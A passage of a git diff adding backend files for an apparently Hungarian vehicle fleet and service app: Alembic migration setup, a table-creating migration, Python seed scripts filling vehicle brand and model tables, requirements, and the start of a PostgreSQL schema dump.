+config.set_main_option("sqlalchemy.url", settings.DATABASE_URL) + +if config.config_file_name is not None: + fileConfig(config.config_file_name) + +target_metadata = Base.metadata + +def do_run_migrations(connection): + context.configure( + connection=connection, + target_metadata=target_metadata, + include_schemas=True, # Adatbázis sémák (pl. 'data') támogatása + version_table_schema='public' # Alembic tábla a public-ban marad + ) + + with context.begin_transaction(): + context.run_migrations() + +async def run_migrations_online() -> None: + """Aszinkron kapcsolat felépítése és migráció futtatása""" + connectable = async_engine_from_config( + config.get_section(config.config_ini_section, {}), + prefix="sqlalchemy.", + poolclass=pool.NullPool, + ) + + async with connectable.connect() as connection: + await connection.run_sync(do_run_migrations) + + await connectable.dispose() + +if context.is_offline_mode(): + url = config.get_main_option("sqlalchemy.url") + context.configure( + url=url, + target_metadata=target_metadata, + literal_binds=True, + include_schemas=True + ) + with context.begin_transaction(): + context.run_migrations() +else: + asyncio.run(run_migrations_online()) \ No newline at end of file diff --git a/backend/migrations/script.py.mako b/backend/migrations/script.py.mako new file mode 100755 index 0000000..1101630 --- /dev/null +++ b/backend/migrations/script.py.mako @@ -0,0 +1,28 @@ +"""${message} + +Revision ID: ${up_revision} +Revises: ${down_revision | comma,n} +Create Date: ${create_date} + +""" +from typing import Sequence, Union + +from alembic import op +import sqlalchemy as sa +${imports if imports else ""} + +# revision identifiers, used by Alembic. +revision: str = ${repr(up_revision)} +down_revision: Union[str, Sequence[str], None] = ${repr(down_revision)} +branch_labels: Union[str, Sequence[str], None] = ${repr(branch_labels)} +depends_on: Union[str, Sequence[str], None] = ${repr(depends_on)} + + +def upgrade() -> None: + """Upgrade schema.""" + ${upgrades if upgrades else "pass"} + + +def downgrade() -> None: + """Downgrade schema.""" + ${downgrades if downgrades else "pass"} diff --git a/backend/migrations/versions/c21c2c7e70d4_clean_gamification_setup.py b/backend/migrations/versions/c21c2c7e70d4_clean_gamification_setup.py new file mode 100755 index 0000000..82ee655 --- /dev/null +++ b/backend/migrations/versions/c21c2c7e70d4_clean_gamification_setup.py @@ -0,0 +1,152 @@ +"""Clean gamification setup + +Revision ID: c21c2c7e70d4 +Revises: +Create Date: 2026-01-24 11:19:10.464212 + +""" +from typing import Sequence, Union + +from alembic import op +import sqlalchemy as sa +from sqlalchemy.dialects import postgresql + +# revision identifiers, used by Alembic. +revision: str = 'c21c2c7e70d4' +down_revision: Union[str, Sequence[str], None] = None +branch_labels: Union[str, Sequence[str], None] = None +depends_on: Union[str, Sequence[str], None] = None + + +def upgrade() -> None: + """Upgrade schema.""" + # ### commands auto generated by Alembic - please adjust! ### + op.create_table('audit_logs', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('user_id', sa.Integer(), nullable=True), + sa.Column('target_type', sa.String(), nullable=True), + sa.Column('target_id', sa.Integer(), nullable=True), + sa.Column('action', sa.String(), nullable=False), + sa.Column('changes', sa.JSON(), nullable=True), + sa.Column('ip_address', sa.String(), nullable=True), + sa.Column('user_agent', sa.String(), nullable=True), + sa.Column('timestamp', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], ), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_audit_logs_id'), 'audit_logs', ['id'], unique=False, schema='data') + op.create_index(op.f('ix_data_audit_logs_target_id'), 'audit_logs', ['target_id'], unique=False, schema='data') + op.create_index(op.f('ix_data_audit_logs_target_type'), 'audit_logs', ['target_type'], unique=False, schema='data') + op.create_table('companies', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('name', sa.String(), nullable=False), + sa.Column('tax_number', sa.String(), nullable=True), + sa.Column('subscription_tier', sa.String(), nullable=True), + sa.Column('owner_id', sa.Integer(), nullable=False), + sa.ForeignKeyConstraint(['owner_id'], ['data.users.id'], ), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_companies_id'), 'companies', ['id'], unique=False, schema='data') + op.create_table('company_members', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('company_id', sa.Integer(), nullable=False), + sa.Column('user_id', sa.Integer(), nullable=False), + sa.Column('role', sa.Enum('OWNER', 'MANAGER', 'DRIVER', name='companyrole'), nullable=False), + sa.Column('can_edit_service', sa.Boolean(), nullable=True), + sa.Column('can_see_costs', sa.Boolean(), nullable=True), + sa.Column('is_active', sa.Boolean(), nullable=True), + sa.ForeignKeyConstraint(['company_id'], ['data.companies.id'], ), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], ), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_company_members_id'), 'company_members', ['id'], unique=False, schema='data') + op.create_table('vehicle_assignments', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('company_id', sa.Integer(), nullable=False), + sa.Column('vehicle_id', sa.Integer(), nullable=False), + sa.Column('driver_id', sa.Integer(), nullable=False), + sa.Column('start_date', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), + sa.Column('end_date', sa.DateTime(timezone=True), nullable=True), + sa.Column('start_odometer', sa.Integer(), nullable=True), + sa.Column('end_odometer', sa.Integer(), nullable=True), + sa.Column('notes', sa.String(), nullable=True), + sa.ForeignKeyConstraint(['company_id'], ['data.companies.id'], ), + sa.ForeignKeyConstraint(['driver_id'], ['data.users.id'], ), + sa.ForeignKeyConstraint(['vehicle_id'], ['data.vehicles.id'], ), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_vehicle_assignments_id'), 'vehicle_assignments', ['id'], unique=False, schema='data') + op.create_table('vehicle_ownerships', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('vehicle_id', sa.Integer(), nullable=False), + sa.Column('user_id', sa.Integer(), nullable=False), + sa.Column('start_date', sa.Date(), nullable=False), + sa.Column('end_date', sa.Date(), nullable=True), + sa.Column('notes', sa.Text(), nullable=True), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], ), + sa.ForeignKeyConstraint(['vehicle_id'], ['data.vehicles.id'], ), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_vehicle_ownerships_id'), 'vehicle_ownerships', ['id'], unique=False, schema='data') + # op.drop_table('costs', schema='data') + # op.drop_table('alembic_version') + # op.drop_table('vehicle_history', schema='data') + # ### end Alembic commands ### + + +def downgrade() -> None: + """Downgrade schema.""" + # ### commands auto generated by Alembic - please adjust! ### + op.create_table('vehicle_history', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('vehicle_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('role', sa.VARCHAR(length=20), autoincrement=False, nullable=False), + sa.Column('start_date', sa.DATE(), autoincrement=False, nullable=False), + sa.Column('end_date', sa.DATE(), autoincrement=False, nullable=True), + sa.Column('start_mileage', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('end_mileage', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('is_active', sa.BOOLEAN(), sa.Computed('(end_date IS NULL)', persisted=True), autoincrement=False, nullable=True), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], name=op.f('vehicle_history_user_id_fkey')), + sa.ForeignKeyConstraint(['vehicle_id'], ['data.vehicles.id'], name=op.f('vehicle_history_vehicle_id_fkey')), + sa.PrimaryKeyConstraint('id', name=op.f('vehicle_history_pkey')), + schema='data' + ) + op.create_table('alembic_version', + sa.Column('version_num', sa.VARCHAR(length=32), autoincrement=False, nullable=False), + sa.PrimaryKeyConstraint('version_num', name=op.f('alembic_version_pkc')) + ) + op.create_table('costs', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('vehicle_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('cost_type', sa.VARCHAR(length=50), autoincrement=False, nullable=False), + sa.Column('amount', sa.NUMERIC(precision=10, scale=2), autoincrement=False, nullable=False), + sa.Column('date', sa.DATE(), autoincrement=False, nullable=False), + sa.Column('mileage_at_cost', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('description', sa.TEXT(), autoincrement=False, nullable=True), + sa.Column('document_url', sa.VARCHAR(length=255), autoincrement=False, nullable=True), + sa.Column('created_at', postgresql.TIMESTAMP(), server_default=sa.text('now()'), autoincrement=False, nullable=True), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], name=op.f('costs_user_id_fkey')), + sa.ForeignKeyConstraint(['vehicle_id'], ['data.vehicles.id'], name=op.f('costs_vehicle_id_fkey')), + sa.PrimaryKeyConstraint('id', name=op.f('costs_pkey')), + schema='data' + ) + op.drop_index(op.f('ix_data_vehicle_ownerships_id'), table_name='vehicle_ownerships', schema='data') + op.drop_table('vehicle_ownerships', schema='data') + op.drop_index(op.f('ix_data_vehicle_assignments_id'), table_name='vehicle_assignments', schema='data') + op.drop_table('vehicle_assignments', schema='data') + op.drop_index(op.f('ix_data_company_members_id'), table_name='company_members', schema='data') + op.drop_table('company_members', schema='data') + op.drop_index(op.f('ix_data_companies_id'), table_name='companies', schema='data') + op.drop_table('companies', schema='data') + op.drop_index(op.f('ix_data_audit_logs_target_type'), table_name='audit_logs', schema='data') + op.drop_index(op.f('ix_data_audit_logs_target_id'), table_name='audit_logs', schema='data') + op.drop_index(op.f('ix_data_audit_logs_id'), table_name='audit_logs', schema='data') + op.drop_table('audit_logs', schema='data') + # ### end Alembic commands ### diff --git a/backend/requirements.txt b/backend/requirements.txt new file mode 100755 index 0000000..100c560 --- /dev/null +++ b/backend/requirements.txt @@ -0,0 +1,19 @@ +fastapi +uvicorn[standard] +sqlalchemy +asyncpg +python-dotenv +python-multipart +python-jose[cryptography] +bcrypt +passlib[bcrypt] +pydantic +pydantic-settings +minio +redis +email-validator +alembic +psycopg[binary] +httpx +pydantic[email] +sendgrid==6.* diff --git a/backend/scrapers/vehicle_master_data.py b/backend/scrapers/vehicle_master_data.py new file mode 100755 index 0000000..23c00ae --- /dev/null +++ b/backend/scrapers/vehicle_master_data.py @@ -0,0 +1,89 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv(os.path.join(os.path.dirname(__file__), '../../.env')) + +DATABASE_URL = os.getenv("DATABASE_URL") + +# Kezdő adatkészlet +INITIAL_DATA = { + "BMW": ["3 Series", "5 Series", "X5", "R 1250 GS (Motor)"], + "Toyota": ["Corolla", "Yaris", "RAV4", "Hilux"], + "Volkswagen": ["Golf", "Passat", "Tiguan", "Polo"], + "Honda": ["Civic", "CR-V", "CB500X (Motor)", "Africa Twin (Motor)"], + "Audi": ["A3", "A4", "A6", "Q5"], + "Mercedes-Benz": ["C-Class", "E-Class", "S-Class", "G-Class"], + "Suzuki": ["Swift", "Vitara", "S-Cross", "DL 650 V-Strom (Motor)"] +} + +async def seed_vehicles(): + # Ha a DATABASE_URL környezeti változóból jön, azt használjuk + engine = create_async_engine(DATABASE_URL) + + try: + async with engine.begin() as conn: + print("--- 🛠️ Struktúra ellenőrzése és építése... ---") + + # 1. SÉMA ÉS TÁBLÁK LÉTREHOZÁSA (Ez a hiányzó láncszem!) + await conn.execute(text("CREATE SCHEMA IF NOT EXISTS ref;")) + + await conn.execute(text(""" + CREATE TABLE IF NOT EXISTS ref.vehicle_makes ( + id SERIAL PRIMARY KEY, + name VARCHAR(100) UNIQUE NOT NULL + ); + """)) + + await conn.execute(text(""" + CREATE TABLE IF NOT EXISTS ref.vehicle_models ( + id SERIAL PRIMARY KEY, + make_id INTEGER REFERENCES ref.vehicle_makes(id) ON DELETE CASCADE, + model_name VARCHAR(100) NOT NULL, + category VARCHAR(50), + technical_data JSONB, + UNIQUE(make_id, model_name) + ); + """)) + print("--- ✅ Táblák sikeresen létrehozva/ellenőrizve ---") + + # 2. ADATOK FELTÖLTÉSE + print(f"--- 📥 Adatok betöltése... ---") + for make, models in INITIAL_DATA.items(): + await conn.execute( + text("INSERT INTO ref.vehicle_makes (name) VALUES (:name) ON CONFLICT (name) DO NOTHING"), + {"name": make} + ) + + result = await conn.execute( + text("SELECT id FROM ref.vehicle_makes WHERE name = :name"), + {"name": make} + ) + make_id = result.scalar() + + for model in models: + category = "Motor" if "(Motor)" in model else "Autó" + clean_model = model.replace(" (Motor)", "") + + await conn.execute( + text(""" + INSERT INTO ref.vehicle_models (make_id, model_name, category) + VALUES (:make_id, :name, :cat) + ON CONFLICT DO NOTHING + """), + {"make_id": make_id, "name": clean_model, "cat": category} + ) + print(f" -> Mentve: {make} {clean_model}") + + print("\n--- 🏁 SIKER! Minden adat a helyén van. ---") + + except Exception as e: + print(f"\n❌ KRITIKUS HIBA: {e}") + + finally: + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(seed_vehicles()) diff --git a/backend/seed_data.py b/backend/seed_data.py new file mode 100755 index 0000000..484a01d --- /dev/null +++ b/backend/seed_data.py @@ -0,0 +1,49 @@ +import asyncio +from sqlalchemy import text +from app.db.session import engine + +# 200+ Autó márka és Motor márkák discovery listája +DATA = { + "CAR": [ + "Toyota", "Volkswagen", "Ford", "BMW", "Mercedes-Benz", "Audi", "Honda", "Hyundai", "Kia", "Mazda", + "Nissan", "Opel", "Peugeot", "Renault", "Skoda", "Suzuki", "Volvo", "Fiat", "Dacia", "Citroen", + "Tesla", "Lexus", "Alfa Romeo", "Jaguar", "Land Rover", "Mitsubishi", "Subaru", "Seat", "Cupra", + "Jeep", "Chevrolet", "Cadillac", "Buick", "GMC", "Dodge", "Ram", "Chrysler", "Acura", "Infiniti", + "Lincoln", "Porsche", "Mini", "Smart", "Bentley", "Rolls-Royce", "Lamborghini", "Ferrari", "Maserati", + "Aston Martin", "Bugatti", "Lotus", "McLaren", "Polestar", "Genesis", "BYD", "Geely", "Chery", "MG", + "Lada", "Iveco", "Isuzu", "SsangYong", "Rover", "Saab", "Lancia", "Pontiac", "Saturn", "Hummer", "Oldsmobile" + ], + "MOTORCYCLE": [ + "Honda", "Yamaha", "Kawasaki", "Suzuki", "BMW Motorrad", "Harley-Davidson", "Ducati", "KTM", "Triumph", + "Royal Enfield", "Indian", "Aprilia", "Moto Guzzi", "Vespa", "Piaggio", "MV Agusta", "Norton", "Husqvarna", + "Benelli", "Bimota", "Beta", "Gas Gas", "Sherco", "CF Moto", "Hyosung", "Keeway", "SYM", "Kymco", "Bajaj", "Zero" + ], + "TRUCK": ["Scania", "Volvo Trucks", "MAN", "DAF", "Iveco", "Mercedes-Benz Trucks", "Renault Trucks", "MACK", "Peterbilt", "Kenworth"], + "VAN": ["Ford Commercial", "Volkswagen Commercial", "Iveco Daily", "Mercedes-Benz Vans", "Fiat Professional"] +} + +async def seed(): + async with engine.begin() as conn: + print("🔍 Adatok szinkronizálása...") + + # 1. Kategóriák + for cat in DATA.keys(): + await conn.execute(text("INSERT INTO data.vehicle_categories (name) VALUES (:n) ON CONFLICT (name) DO NOTHING"), {"n": cat}) + + res = await conn.execute(text("SELECT id, name FROM data.vehicle_categories")) + cat_map = {row.name: row.id for row in res} + + # 2. Márkák feltöltése + count = 0 + for cat_name, brands in DATA.items(): + cat_id = cat_map[cat_name] + for brand in brands: + await conn.execute(text( + "INSERT INTO data.vehicle_brands (category_id, name) VALUES (:c, :n) ON CONFLICT DO NOTHING" + ), {"c": cat_id, "n": brand}) + count += 1 + + print(f"✅ SIKER: {count} márka rögzítve az adatbázisban!") + +if __name__ == "__main__": + asyncio.run(seed()) diff --git a/backend/seed_models.py b/backend/seed_models.py new file mode 100755 index 0000000..26f3e4b --- /dev/null +++ b/backend/seed_models.py @@ -0,0 +1,35 @@ +import asyncio +from sqlalchemy import text +from app.db.session import engine + +# Discovery adatok a 200 márkához (példa bővíthető) +MODELS_DISCOVERY = { + "Toyota": ["Corolla", "Yaris", "Hilux", "RAV4", "C-HR", "Avensis", "Land Cruiser"], + "Volkswagen": ["Golf", "Passat", "Polo", "Tiguan", "Touran", "Transporter", "Caddy"], + "BMW": ["3 Series", "5 Series", "X5", "X3", "1 Series", "7 Series"], + "Honda": ["Civic", "CR-V", "Jazz", "Accord", "CB 500", "Africa Twin"], # Autó és motor is! + "Yamaha": ["MT-07", "R1", "Tracer 900", "Ténéré 700", "XMAX"], + "Scania": ["R-series", "S-series", "G-series", "P-series"] +} + +async def discovery_bot(): + async with engine.begin() as conn: + print("🤖 Jármű típus felderítő bot indul...") + + # Lekérjük az összes márkát + res = await conn.execute(text("SELECT id, name FROM data.vehicle_brands")) + brands = res.fetchall() + + count = 0 + for b_id, b_name in brands: + if b_name in MODELS_DISCOVERY: + for model in MODELS_DISCOVERY[b_name]: + await conn.execute(text( + "INSERT INTO data.vehicle_models (brand_id, name) VALUES (:b, :n) ON CONFLICT DO NOTHING" + ), {"b": b_id, "n": model}) + count += 1 + + print(f"✅ Bot végzett: {count} új típus rögzítve!") + +if __name__ == "__main__": + asyncio.run(discovery_bot()) \ No newline at end of file diff --git a/backend/seed_passenger_cars.py b/backend/seed_passenger_cars.py new file mode 100755 index 0000000..37152a2 --- /dev/null +++ b/backend/seed_passenger_cars.py @@ -0,0 +1,82 @@ +import psycopg2 +from psycopg2.extras import RealDictCursor +import os +from dotenv import load_dotenv + +load_dotenv() + +def get_connection(): + db_host = os.getenv("POSTGRES_HOST", "localhost") + if db_host == "postgres-db": + db_host = "localhost" + + return psycopg2.connect( + dbname=os.getenv("POSTGRES_DB", "service_finder"), + user=os.getenv("POSTGRES_USER", "kincses"), + password=os.getenv("POSTGRES_PASSWORD", "PASSWORD"), + host=db_host, + port=os.getenv("POSTGRES_PORT", "5432") + ) + +def seed_system(): + conn = None + try: + conn = get_connection() + cur = conn.cursor(cursor_factory=RealDictCursor) + print("🚀 Kapcsolat aktív. Adatok szinkronizálása...") + + # 1. MÁRKÁK SZINKRONIZÁLÁSA + brands = [ + {'name': 'Volkswagen', 'slug': 'volkswagen', 'origin': 'Germany'}, + {'name': 'Audi', 'slug': 'audi', 'origin': 'Germany'}, + {'name': 'BMW', 'slug': 'bmw', 'origin': 'Germany'}, + {'name': 'Skoda', 'slug': 'skoda', 'origin': 'Czech Republic'}, + {'name': 'Toyota', 'slug': 'toyota', 'origin': 'Japan'} + ] + + for b in brands: + # Megnézzük, létezik-e már + cur.execute("SELECT id FROM data.vehicle_brands WHERE name = %s", (b['name'],)) + row = cur.fetchone() + + if row: + # Frissítés (Update), ha már létezik + cur.execute(""" + UPDATE data.vehicle_brands + SET slug = COALESCE(slug, %s), + country_of_origin = %s + WHERE id = %s + """, (b['slug'], b['origin'], row['id'])) + else: + # Beszúrás (Insert), ha új + cur.execute(""" + INSERT INTO data.vehicle_brands (name, slug, country_of_origin) + VALUES (%s, %s, %s) + """, (b['name'], b['slug'], b['origin'])) + + # 2. MOTOROK SZINKRONIZÁLÁSA + engines = [ + ('CAGA', 'diesel', 105, 15000), + ('DADA', 'petrol', 110, 30000), + ('B47D20', 'diesel', 140, 25000) + ] + + for code, fuel, kw, interval in engines: + cur.execute("SELECT id FROM data.engine_specs WHERE engine_code = %s", (code,)) + if not cur.fetchone(): + cur.execute(""" + INSERT INTO data.engine_specs (engine_code, fuel_type, power_kw, default_service_interval_km) + VALUES (%s, %s, %s, %s) + """, (code, fuel, kw, interval)) + + conn.commit() + print("✅ Szinkronizálás sikeres! Az adatbázis naprakész.") + + except Exception as e: + print(f"❌ Hiba: {e}") + if conn: conn.rollback() + finally: + if conn: conn.close() + +if __name__ == "__main__": + seed_system() \ No newline at end of file diff --git a/backend/seed_vehicles.py b/backend/seed_vehicles.py new file mode 100755 index 0000000..3bcfaeb --- /dev/null +++ b/backend/seed_vehicles.py @@ -0,0 +1,49 @@ +import asyncio +from sqlalchemy import text +from app.db.session import engine + +# 200+ Autó márka és Motor márkák discovery listája +DATA = { + "CAR": [ + "Toyota", "Volkswagen", "Ford", "BMW", "Mercedes-Benz", "Audi", "Honda", "Hyundai", "Kia", "Mazda", + "Nissan", "Opel", "Peugeot", "Renault", "Skoda", "Suzuki", "Volvo", "Fiat", "Dacia", "Citroen", + "Tesla", "Lexus", "Alfa Romeo", "Jaguar", "Land Rover", "Mitsubishi", "Subaru", "Seat", "Cupra", + "Jeep", "Chevrolet", "Cadillac", "Buick", "GMC", "Dodge", "Ram", "Chrysler", "Acura", "Infiniti", + "Lincoln", "Porsche", "Mini", "Smart", "Bentley", "Rolls-Royce", "Lamborghini", "Ferrari", "Maserati", + "Aston Martin", "Bugatti", "Lotus", "McLaren", "Polestar", "Genesis", "BYD", "Geely", "Chery", "MG", + "Lada", "Iveco", "Isuzu", "SsangYong", "Rover", "Saab", "Lancia", "Pontiac", "Saturn", "Hummer", "Oldsmobile" + ], + "MOTORCYCLE": [ + "Honda", "Yamaha", "Kawasaki", "Suzuki", "BMW Motorrad", "Harley-Davidson", "Ducati", "KTM", "Triumph", + "Royal Enfield", "Indian", "Aprilia", "Moto Guzzi", "Vespa", "Piaggio", "MV Agusta", "Norton", "Husqvarna", + "Benelli", "Bimota", "Beta", "Gas Gas", "Sherco", "CF Moto", "Hyosung", "Keeway", "SYM", "Kymco", "Bajaj", "Zero" + ], + "TRUCK": ["Scania", "Volvo Trucks", "MAN", "DAF", "Iveco", "Mercedes-Benz Trucks", "Renault Trucks", "MACK", "Peterbilt", "Kenworth"], + "VAN": ["Ford Commercial", "Volkswagen Commercial", "Iveco Daily", "Mercedes-Benz Vans", "Fiat Professional"] +} + +async def seed(): + async with engine.begin() as conn: + print("🔍 Adatok szinkronizálása...") + + # 1. Kategóriák + for cat in DATA.keys(): + await conn.execute(text("INSERT INTO data.vehicle_categories (name) VALUES (:n) ON CONFLICT (name) DO NOTHING"), {"n": cat}) + + res = await conn.execute(text("SELECT id, name FROM data.vehicle_categories")) + cat_map = {row.name: row.id for row in res} + + # 2. Márkák feltöltése + count = 0 + for cat_name, brands in DATA.items(): + cat_id = cat_map[cat_name] + for brand in brands: + await conn.execute(text( + "INSERT INTO data.vehicle_brands (category_id, name) VALUES (:c, :n) ON CONFLICT DO NOTHING" + ), {"c": cat_id, "n": brand}) + count += 1 + + print(f"✅ SIKER: {count} márka rögzítve az adatbázisban!") + +if __name__ == "__main__": + asyncio.run(seed()) \ No newline at end of file diff --git a/backup_20260128_alap_kesz.sql b/backup_20260128_alap_kesz.sql new file mode 100755 index 0000000..d86f57f --- /dev/null +++ b/backup_20260128_alap_kesz.sql @@ -0,0 +1,3866 @@ +-- +-- PostgreSQL database dump +-- + +\restrict jRVVCTjjNeqN7io926QnQVJwr7IrvCK3DlzNPCoIfbivC5osmHT8eLuiehzRiDV + +-- Dumped from database version 15.15 (Debian 15.15-1.pgdg13+1) +-- Dumped by pg_dump version 15.15 (Debian 15.15-1.pgdg13+1) + +SET statement_timeout = 0; +SET lock_timeout = 0; +SET idle_in_transaction_session_timeout = 0; +SET client_encoding = 'UTF8'; +SET standard_conforming_strings = on; +SELECT pg_catalog.set_config('search_path', '', false); +SET check_function_bodies = false; +SET xmloption = content; +SET client_min_messages = warning; +SET row_security = off; + +-- +-- Name: data; Type: SCHEMA; Schema: -; Owner: kincses +-- + +CREATE SCHEMA data; + + +ALTER SCHEMA data OWNER TO kincses; + +-- +-- Name: public; Type: SCHEMA; Schema: -; Owner: service_finder_app +-- + +-- *not* creating schema, since initdb creates it + + +ALTER SCHEMA public OWNER TO service_finder_app; + +-- +-- Name: companyrole; Type: TYPE; Schema: data; Owner: kincses +-- + +CREATE TYPE data.companyrole AS ENUM ( + 'owner', + 'manager', + 'driver' +); + + +ALTER TYPE data.companyrole OWNER TO kincses; + +-- +-- Name: expense_category_enum; Type: TYPE; Schema: data; Owner: kincses +-- + +CREATE TYPE data.expense_category_enum AS ENUM ( + 'PURCHASE_PRICE', + 'TRANSFER_TAX', + 'ADMIN_FEE', + 'VEHICLE_TAX', + 'INSURANCE', + 'REFUELING', + 'SERVICE', + 'PARKING', + 'TOLL', + 'FINE', + 'TUNING_ACCESSORIES', + 'OTHER' +); + + +ALTER TYPE data.expense_category_enum OWNER TO kincses; + +-- +-- Name: moderation_status_enum; Type: TYPE; Schema: data; Owner: kincses +-- + +CREATE TYPE data.moderation_status_enum AS ENUM ( + 'pending', + 'approved', + 'rejected' +); + + +ALTER TYPE data.moderation_status_enum OWNER TO kincses; + +-- +-- Name: source_type_enum; Type: TYPE; Schema: data; Owner: kincses +-- + +CREATE TYPE data.source_type_enum AS ENUM ( + 'manual', + 'ocr', + 'api_import' +); + + +ALTER TYPE data.source_type_enum OWNER TO kincses; + +-- +-- Name: companyrole; Type: TYPE; Schema: public; Owner: kincses +-- + +CREATE TYPE public.companyrole AS ENUM ( + 'OWNER', + 'MANAGER', + 'DRIVER' +); + + +ALTER TYPE public.companyrole OWNER TO kincses; + +-- +-- Name: emailtype; Type: TYPE; Schema: public; Owner: kincses +-- + +CREATE TYPE public.emailtype AS ENUM ( + 'REGISTRATION', + 'PASSWORD_RESET', + 'GDPR_NOTICE' +); + + +ALTER TYPE public.emailtype OWNER TO kincses; + +-- +-- Name: orgtype; Type: TYPE; Schema: public; Owner: kincses +-- + +CREATE TYPE public.orgtype AS ENUM ( + 'PRIVATE', + 'COMPANY', + 'SERVICE' +); + + +ALTER TYPE public.orgtype OWNER TO kincses; + +-- +-- Name: orguserrole; Type: TYPE; Schema: public; Owner: kincses +-- + +CREATE TYPE public.orguserrole AS ENUM ( + 'OWNER', + 'ADMIN', + 'FLEET_MANAGER', + 'DRIVER', + 'owner', + 'manager', + 'driver', + 'service' +); + + +ALTER TYPE public.orguserrole OWNER TO kincses; + +-- +-- Name: tokentype; Type: TYPE; Schema: public; Owner: kincses +-- + +CREATE TYPE public.tokentype AS ENUM ( + 'EMAIL_VERIFY', + 'PASSWORD_RESET', + 'email_verify' +); + + +ALTER TYPE public.tokentype OWNER TO kincses; + +-- +-- Name: uitheme; Type: TYPE; Schema: public; Owner: kincses +-- + +CREATE TYPE public.uitheme AS ENUM ( + 'LIGHT', + 'DARK', + 'SYSTEM' +); + + +ALTER TYPE public.uitheme OWNER TO kincses; + +-- +-- Name: userrole; Type: TYPE; Schema: public; Owner: kincses +-- + +CREATE TYPE public.userrole AS ENUM ( + 'OWNER', + 'ADMIN', + 'FLEET_MANAGER', + 'DRIVER' +); + + +ALTER TYPE public.userrole OWNER TO kincses; + +-- +-- Name: validationstatus; Type: TYPE; Schema: public; Owner: kincses +-- + +CREATE TYPE public.validationstatus AS ENUM ( + 'NOT_VALIDATED', + 'PENDING', + 'VALIDATED', + 'REJECTED' +); + + +ALTER TYPE public.validationstatus OWNER TO kincses; + +SET default_tablespace = ''; + +SET default_table_access_method = heap; + +-- +-- Name: audit_logs; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.audit_logs ( + id integer NOT NULL, + user_id integer, + action character varying(100) NOT NULL, + endpoint character varying(255), + method character varying(10), + payload jsonb, + ip_address character varying(45), + user_agent text, + created_at timestamp with time zone DEFAULT CURRENT_TIMESTAMP +); + + +ALTER TABLE data.audit_logs OWNER TO kincses; + +-- +-- Name: audit_logs_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.audit_logs_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.audit_logs_id_seq OWNER TO kincses; + +-- +-- Name: audit_logs_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.audit_logs_id_seq OWNED BY data.audit_logs.id; + + +-- +-- Name: badges; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.badges ( + id integer NOT NULL, + name character varying NOT NULL, + description character varying NOT NULL, + icon_url character varying +); + + +ALTER TABLE data.badges OWNER TO kincses; + +-- +-- Name: badges_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.badges_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.badges_id_seq OWNER TO kincses; + +-- +-- Name: badges_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.badges_id_seq OWNED BY data.badges.id; + + +-- +-- Name: companies; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.companies ( + id integer NOT NULL, + name character varying(255) NOT NULL, + tax_number character varying(50), + subscription_tier character varying(50) DEFAULT 'free'::character varying, + owner_id integer NOT NULL +); + + +ALTER TABLE data.companies OWNER TO kincses; + +-- +-- Name: companies_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.companies_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; + + +ALTER TABLE data.companies_id_seq OWNER TO kincses; + +-- +-- Name: companies_id_seq; Type: SEQUENCE OWNED BY; Schema: data; Owner: kincses +-- + +ALTER SEQUENCE data.companies_id_seq OWNED BY data.companies.id; + + +-- +-- Name: company_members; Type: TABLE; Schema: data; Owner: kincses +-- + +CREATE TABLE data.company_members ( + id integer NOT NULL, + company_id integer NOT NULL, + user_id integer NOT NULL, + role data.companyrole DEFAULT 'driver'::data.companyrole, + can_edit_service boolean DEFAULT false, + can_see_costs boolean DEFAULT false, + is_active boolean DEFAULT true +); + + +ALTER TABLE data.company_members OWNER TO kincses; + +-- +-- Name: company_members_id_seq; Type: SEQUENCE; Schema: data; Owner: kincses +-- + +CREATE SEQUENCE data.company_members_id_seq + AS integer + START WITH 1 + INCREMENT BY 1 + NO MINVALUE + NO MAXVALUE + CACHE 1; 